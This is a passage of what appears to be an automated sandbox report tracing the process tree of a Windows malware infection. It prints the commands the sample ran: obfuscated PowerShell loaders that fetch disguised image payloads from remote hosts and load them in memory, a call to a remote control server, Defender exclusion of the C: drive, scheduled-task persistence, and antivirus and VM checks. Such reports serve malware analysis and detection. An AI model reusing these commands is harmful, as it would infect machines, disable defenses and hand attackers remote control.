                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4564,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4720 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:2920
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5012,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5264 /prefetch:8
                                                                      8⤵
                                                                        PID:5648
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,4617786195355776464,17596171987503960163,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5400 /prefetch:8
                                                                        8⤵
                                                                          PID:2320
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        7⤵
                                                                        • Uses browser remote debugging
                                                                        • Enumerates system info in registry
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        PID:1072
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ff969e6f208,0x7ff969e6f214,0x7ff969e6f220
                                                                          8⤵
                                                                            PID:7132
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2108,i,3981530274305666658,5171419860560613795,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:2
                                                                            8⤵
                                                                              PID:624
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,3981530274305666658,5171419860560613795,262144 --variations-seed-version --mojo-platform-channel-handle=2324 /prefetch:3
                                                                              8⤵
                                                                                PID:5900
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1948,i,3981530274305666658,5171419860560613795,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:8
                                                                                8⤵
                                                                                  PID:3684
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,3981530274305666658,5171419860560613795,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:6128
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,3981530274305666658,5171419860560613795,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:1
                                                                                  8⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:448
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\wbaa1" & exit
                                                                                7⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1084
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /t 11
                                                                                  8⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:3040
                                                                            • C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              PID:6440
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c 1.bat && 2.js
                                                                                7⤵
                                                                                • Checks computer location settings
                                                                                • Modifies registry class
                                                                                PID:5668
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic cpu get name
                                                                                  8⤵
                                                                                    PID:6808
                                                                                  • C:\Windows\system32\find.exe
                                                                                    find "QEMU"
                                                                                    8⤵
                                                                                      PID:6340
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                                                      8⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:6804
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                                        9⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4564
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                          10⤵
                                                                                            PID:5876
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            10⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1640
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                                                                                        8⤵
                                                                                          PID:3176
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe"
                                                                                      6⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1700
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                                                                                        7⤵
                                                                                        • Drops startup file
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:7624
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                                                                                          8⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7428
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
                                                                                        7⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:8092
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDB77.tmp"
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5324
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5636
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:4312
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10301380101\50KfF6O.exe
                                                                                        7⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:6864
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10301390101\zx4PJh6.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10301390101\zx4PJh6.exe"
                                                                                      6⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:7388
                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:7708
                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                          tasklist
                                                                                          8⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4856
                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                          findstr /I "opssvc wrsa"
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3860
                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                          tasklist
                                                                                          8⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1488
                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4604
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c md 440824
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4652
                                                                                        • C:\Windows\SysWOW64\extrac32.exe
                                                                                          extrac32 /Y /E Architecture.wmv
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4072
                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                          findstr /V "Offensive" Inter
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2868
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5100
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2376
                                                                                        • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                                                                                          Organizations.com h
                                                                                          8⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:8068
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 8068 -s 912
                                                                                            9⤵
                                                                                            • Program crash
                                                                                            PID:13064
                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                          choice /d y /t 5
                                                                                          8⤵
                                                                                            PID:6056
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10301400101\4wAPcC0.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10301400101\4wAPcC0.exe"
                                                                                        6⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6444
                                                                                        • C:\Users\Admin\AppData\Roaming\media\svchost.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\media\svchost.exe"
                                                                                          7⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:7324
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10301410101\d3jhg_003.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10301410101\d3jhg_003.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:7696
                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                          7⤵
                                                                                            PID:7584
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
